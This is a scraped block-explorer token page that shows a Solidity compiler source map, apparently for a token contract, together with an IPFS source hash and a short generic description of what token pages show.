0:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:329::-;3505:6;3554:2;3542:9;3533:7;3529:23;3525:32;3522:119;;;3560:79;;:::i;:::-;3522:119;3680:1;3705:53;3750:7;3741:6;3730:9;3726:22;3705:53;:::i;:::-;3695:63;;3651:117;3446:329;;;;:::o;3781:118::-;3868:24;3886:5;3868:24;:::i;:::-;3863:3;3856:37;3781:118;;:::o;3905:222::-;3998:4;4036:2;4025:9;4021:18;4013:26;;4049:71;4117:1;4106:9;4102:17;4093:6;4049:71;:::i;:::-;3905:222;;;;:::o;4133:619::-;4210:6;4218;4226;4275:2;4263:9;4254:7;4250:23;4246:32;4243:119;;;4281:79;;:::i;:::-;4243:119;4401:1;4426:53;4471:7;4462:6;4451:9;4447:22;4426:53;:::i;:::-;4416:63;;4372:117;4528:2;4554:53;4599:7;4590:6;4579:9;4575:22;4554:53;:::i;:::-;4544:63;;4499:118;4656:2;4682:53;4727:7;4718:6;4707:9;4703:22;4682:53;:::i;:::-;4672:63;;4627:118;4133:619;;;;;:::o;4758:86::-;4793:7;4833:4;4826:5;4822:16;4811:27;;4758:86;;;:::o;4850:112::-;4933:22;4949:5;4933:22;:::i;:::-;4928:3;4921:35;4850:112;;:::o;4968:214::-;5057:4;5095:2;5084:9;5080:18;5072:26;;5108:67;5172:1;5161:9;5157:17;5148:6;5108:67;:::i;:::-;4968:214;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:474::-;5608:6;5616;5665:2;5653:9;5644:7;5640:23;5636:32;5633:119;;;5671:79;;:::i;:::-;5633:119;5791:1;5816:53;5861:7;5852:6;5841:9;5837:22;5816:53;:::i;:::-;5806:63;;5762:117;5918:2;5944:53;5989:7;5980:6;5969:9;5965:22;5944:53;:::i;:::-;5934:63;;5889:118;5540:474;;;;;:::o;6020:180::-;6068:77;6065:1;6058:88;6165:4;6162:1;6155:15;6189:4;6186:1;6179:15;6206:320;6250:6;6287:1;6281:4;6277:12;6267:22;;6334:1;6328:4;6324:12;6355:18;6345:81;;6411:4;6403:6;6399:17;6389:27;;6345:81;6473:2;6465:6;6462:14;6442:18;6439:38;6436:84;;6492:18;;:::i;:::-;6436:84;6257:269;6206:320;;;:::o;6532:180::-;6580:77;6577:1;6570:88;6677:4;6674:1;6667:15;6701:4;6698:1;6691:15;6718:191;6758:3;6777:20;6795:1;6777:20;:::i;:::-;6772:25;;6811:20;6829:1;6811:20;:::i;:::-;6806:25;;6854:1;6851;6847:9;6840:16;;6875:3;6872:1;6869:10;6866:36;;;6882:18;;:::i;:::-;6866:36;6718:191;;;;:::o;6915:410::-;6955:7;6978:20;6996:1;6978:20;:::i;:::-;6973:25;;7012:20;7030:1;7012:20;:::i;:::-;7007:25;;7067:1;7064;7060:9;7089:30;7107:11;7089:30;:::i;:::-;7078:41;;7268:1;7259:7;7255:15;7252:1;7249:22;7229:1;7222:9;7202:83;7179:139;;7298:18;;:::i;:::-;7179:139;6963:362;6915:410;;;;:::o;7331:224::-;7471:34;7467:1;7459:6;7455:14;7448:58;7540:7;7535:2;7527:6;7523:15;7516:32;7331:224;:::o;7561:366::-;7703:3;7724:67;7788:2;7783:3;7724:67;:::i;:::-;7717:74;;7800:93;7889:3;7800:93;:::i;:::-;7918:2;7913:3;7909:12;7902:19;;7561:366;;;:::o;7933:419::-;8099:4;8137:2;8126:9;8122:18;8114:26;;8186:9;8180:4;8176:20;8172:1;8161:9;8157:17;8150:47;8214:131;8340:4;8214:131;:::i;:::-;8206:139;;7933:419;;;:::o;8358:225::-;8498:34;8494:1;8486:6;8482:14;8475:58;8567:8;8562:2;8554:6;8550:15;8543:33;8358:225;:::o;8589:366::-;8731:3;8752:67;8816:2;8811:3;8752:67;:::i;:::-;8745:74;;8828:93;8917:3;8828:93;:::i;:::-;8946:2;8941:3;8937:12;8930:19;;8589:366;;;:::o;8961:419::-;9127:4;9165:2;9154:9;9150:18;9142:26;;9214:9;9208:4;9204:20;9200:1;9189:9;9185:17;9178:47;9242:131;9368:4;9242:131;:::i;:::-;9234:139;;8961:419;;;:::o;9386:177::-;9526:29;9522:1;9514:6;9510:14;9503:53;9386:177;:::o;9569:366::-;9711:3;9732:67;9796:2;9791:3;9732:67;:::i;:::-;9725:74;;9808:93;9897:3;9808:93;:::i;:::-;9926:2;9921:3;9917:12;9910:19;;9569:366;;;:::o;9941:419::-;10107:4;10145:2;10134:9;10130:18;10122:26;;10194:9;10188:4;10184:20;10180:1;10169:9;10165:17;10158:47;10222:131;10348:4;10222:131;:::i;:::-;10214:139;;9941:419;;;:::o;10366:223::-;10506:34;10502:1;10494:6;10490:14;10483:58;10575:6;10570:2;10562:6;10558:15;10551:31;10366:223;:::o;10595:366::-;10737:3;10758:67;10822:2;10817:3;10758:67;:::i;:::-;10751:74;;10834:93;10923:3;10834:93;:::i;:::-;10952:2;10947:3;10943:12;10936:19;;10595:366;;;:::o;10967:419::-;11133:4;11171:2;11160:9;11156:18;11148:26;;11220:9;11214:4;11210:20;11206:1;11195:9;11191:17;11184:47;11248:131;11374:4;11248:131;:::i;:::-;11240:139;;10967:419;;;:::o;11392:221::-;11532:34;11528:1;11520:6;11516:14;11509:58;11601:4;11596:2;11588:6;11584:15;11577:29;11392:221;:::o;11619:366::-;11761:3;11782:67;11846:2;11841:3;11782:67;:::i;:::-;11775:74;;11858:93;11947:3;11858:93;:::i;:::-;11976:2;11971:3;11967:12;11960:19;;11619:366;;;:::o;11991:419::-;12157:4;12195:2;12184:9;12180:18;12172:26;;12244:9;12238:4;12234:20;12230:1;12219:9;12215:17;12208:47;12272:131;12398:4;12272:131;:::i;:::-;12264:139;;11991:419;;;:::o;12416:179::-;12556:31;12552:1;12544:6;12540:14;12533:55;12416:179;:::o;12601:366::-;12743:3;12764:67;12828:2;12823:3;12764:67;:::i;:::-;12757:74;;12840:93;12929:3;12840:93;:::i;:::-;12958:2;12953:3;12949:12;12942:19;;12601:366;;;:::o;12973:419::-;13139:4;13177:2;13166:9;13162:18;13154:26;;13226:9;13220:4;13216:20;13212:1;13201:9;13197:17;13190:47;13254:131;13380:4;13254:131;:::i;:::-;13246:139;;12973:419;;;:::o;13398:224::-;13538:34;13534:1;13526:6;13522:14;13515:58;13607:7;13602:2;13594:6;13590:15;13583:32;13398:224;:::o;13628:366::-;13770:3;13791:67;13855:2;13850:3;13791:67;:::i;:::-;13784:74;;13867:93;13956:3;13867:93;:::i;:::-;13985:2;13980:3;13976:12;13969:19;;13628:366;;;:::o;14000:419::-;14166:4;14204:2;14193:9;14189:18;14181:26;;14253:9;14247:4;14243:20;14239:1;14228:9;14224:17;14217:47;14281:131;14407:4;14281:131;:::i;:::-;14273:139;;14000:419;;;:::o;14425:222::-;14565:34;14561:1;14553:6;14549:14;14542:58;14634:5;14629:2;14621:6;14617:15;14610:30;14425:222;:::o;14653:366::-;14795:3;14816:67;14880:2;14875:3;14816:67;:::i;:::-;14809:74;;14892:93;14981:3;14892:93;:::i;:::-;15010:2;15005:3;15001:12;14994:19;;14653:366;;;:::o;15025:419::-;15191:4;15229:2;15218:9;15214:18;15206:26;;15278:9;15272:4;15268:20;15264:1;15253:9;15249:17;15242:47;15306:131;15432:4;15306:131;:::i;:::-;15298:139;;15025:419;;;:::o;15450:225::-;15590:34;15586:1;15578:6;15574:14;15567:58;15659:8;15654:2;15646:6;15642:15;15635:33;15450:225;:::o;15681:366::-;15823:3;15844:67;15908:2;15903:3;15844:67;:::i;:::-;15837:74;;15920:93;16009:3;15920:93;:::i;:::-;16038:2;16033:3;16029:12;16022:19;;15681:366;;;:::o;16053:419::-;16219:4;16257:2;16246:9;16242:18;16234:26;;16306:9;16300:4;16296:20;16292:1;16281:9;16277:17;16270:47;16334:131;16460:4;16334:131;:::i;:::-;16326:139;;16053:419;;;:::o;16478:182::-;16618:34;16614:1;16606:6;16602:14;16595:58;16478:182;:::o;16666:366::-;16808:3;16829:67;16893:2;16888:3;16829:67;:::i;:::-;16822:74;;16905:93;16994:3;16905:93;:::i;:::-;17023:2;17018:3;17014:12;17007:19;;16666:366;;;:::o;17038:419::-;17204:4;17242:2;17231:9;17227:18;17219:26;;17291:9;17285:4;17281:20;17277:1;17266:9;17262:17;17255:47;17319:131;17445:4;17319:131;:::i;:::-;17311:139;;17038:419;;;:::o;17463:194::-;17503:4;17523:20;17541:1;17523:20;:::i;:::-;17518:25;;17557:20;17575:1;17557:20;:::i;:::-;17552:25;;17601:1;17598;17594:9;17586:17;;17625:1;17619:4;17616:11;17613:37;;;17630:18;;:::i;:::-;17613:37;17463:194;;;;:::o

Swarm Source

ipfs://749a7b2f9e78d1a10b9630e58a5e2a458b4c5e7b38fbde239099375cf0c7c014
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.